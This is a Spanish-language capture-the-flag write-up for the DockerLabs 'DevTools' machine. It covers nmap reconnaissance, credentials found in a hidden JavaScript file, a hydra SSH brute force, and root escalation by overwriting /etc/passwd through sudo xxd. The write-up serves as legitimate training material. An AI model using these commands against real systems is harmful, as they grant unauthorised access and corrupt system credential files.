maciferna
  • 🖥️Whoami
  • 📚Writeups
    • BugBountyLabs
      • Corsy
    • DockerLabs
      • 0xc0ffee
      • 404-Not-Found
      • Allien
      • Anonymouspingu
      • Apolos
      • Asucar
      • Backend
      • BadPlugin
      • Balulero
      • Borazuwarahctf
      • Bruteshock
      • Buffered
      • Candy
      • Chmod-4755
      • Corruptress
      • Cracker
      • Crackoff
      • Dance-Samba
      • Darkweb
      • Debugme
      • Devil
      • Devtools
      • Eclipse
      • Express
      • File
      • Findyourstyle
      • Flow
      • Forgotten_Portal
      • Gallery
      • Hackmedaddy
      • Hidden
      • Inj3ct0rss
      • Injection
      • Insanity
      • Jenkhack
      • Lfi.elf
      • Life Or Dead
      • Mapache2
      • Master
      • Machupichu
      • Mirame
      • Paradise
      • Patria Querida
      • PingPong
      • Pntopntobarra
      • Pressenter
      • Raas
      • Report
      • Reverse
      • Rubiks
      • R00tless
      • Seeker
      • Sender
      • Showtime
      • Sites
      • Smashing
      • Spain
      • Stack
      • Stellarjwt
      • Stranger
      • SubVersion
      • The Dog
      • UserSearch
      • Vulnvault
      • Vulnerame
      • Wallet
      • Winterfell
    • HackMyVM
      • Hero
      • MagiFi
    • HackTheBox
      • Puppy
    • The Hackers Labs
      • Casa Paco
      • Shadow Gate
      • Token Of Hate
    • Vulnyx
      • Lost Tape
Con tecnología de GitBook
En esta página
  • Reconocimiento
  • Intrusión
  • Escalada de privilegios
  • Root
  1. Writeups
  2. DockerLabs

Devtools

AnteriorDevilSiguienteEclipse

Última actualización hace 5 meses

Máquina "DevTools" de DockerLabs

Autor: El Pingüino de Mario

Dificultad: Medio

Reconocimiento

Empezamos con un escaneo de nmap:

nmap -sSVC -p- -Pn -n --open --min-rate 5000 -vvv 172.17.0.2 -oN escaneo.txt
# Nmap 7.95 scan initiated Sun Dec 15 10:59:27 2024 as: nmap -sSVC -p- -Pn -n --open --min-rate 5000 -vvv -oN escaneo.txt 172.17.0.2
Nmap scan report for 172.17.0.2
Host is up, received arp-response (0.000012s latency).
Scanned at 2024-12-15 10:59:27 -03 for 8s
Not shown: 65533 closed tcp ports (reset)
PORT   STATE SERVICE REASON         VERSION
22/tcp open  ssh     syn-ack ttl 64 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey: 
|   256 4d:ea:92:ba:53:e3:b8:dc:71:95:50:19:87:6b:b2:6d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBHySp29oLAUPUU27byLQHAEweVlLXLNNoJgJaI/3JeRE+R+8K0xWa4pAawQpPvD2Xrpuf7MovEvk2DSIgp85zoY=
|   256 fa:77:68:76:dc:8e:b1:cd:56:5f:c1:79:89:ad:fa:78 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAINOqd4h1jKYg1fOng1zCM8B/Z0aA4iM5Q7lEm6SW+n7p
80/tcp open  http    syn-ack ttl 64 Apache httpd 2.4.62 ((Debian))
| http-methods: 
|_  Supported Methods: OPTIONS HEAD GET POST
|_http-title: \xC2\xBFQu\xC3\xA9 son las DevTools del Navegador?
|_http-server-header: Apache/2.4.62 (Debian)
MAC Address: 02:42:AC:11:00:02 (Unknown)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Read data files from: /usr/bin/../share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
# Nmap done at Sun Dec 15 10:59:36 2024 -- 1 IP address (1 host up) scanned in 8.57 seconds

Solo tenemos dos puertos abiertos:

•Puerto 22: OpenSSH 9.2p1

•Puerto 80: Apache httpd 2.4.62

y nos enfrentamos a un Debian.

Si vamos a la web, nos saltará un cuadro que nos pide iniciar sesión, pero nosotros no tenemos la contraseña. Luego de probar un rato, decido leer el código fuente de la página (curl 172.17.0.2) y veo que dice lo siguiente en el principio:

<script src="backupp.js" defer></script>

Viendo esto, puede ser que el archivo se intente ocultar ya que su nombre es "backup" pero con dos "p", por lo que si lo revisamos, veremos que nos da las credenciales:

si probamos las credenciales en la web nos funcionan correctamente, pero no para entrar por ssh, pero si revisamos el comentario:

// Antigua contraseña beluleroh

(Supongo que mario quiso poner "baluleroh" (su perro) pero ahi en la maquina puso "beluleroh")

Por lo que podriamos intentar un ataque de hydra pero con usuarios.

Intrusión

Continuamos haciendo el ataque:

hydra -L /usr/share/seclists/Usernames/xato-net-10-million-usernames.txt -p baluleroh -V ssh://172.17.0.2 -t 64

Ya tenemos credenciales, por lo que continuaremos conectándonos por ssh.

Escalada de privilegios

Carlos

Siendo el usuario carlos, ejecuto un sudo -l y veo que puedo ejecutar ping como root y xxd, por lo que luego de buscar, veo que puedo editar el /etc/passwd de la siguiente manera:

echo root::0:0:root:/root:/bin/bash | sudo xxd | sudo xxd -r - "/etc/passwd"

Por lo que una vez ejecutado eso, ejecutamos su y escalamos a root.

Root

Gracias por leer :)

📚
DevTools
Credenciales
Carlos-pass
Root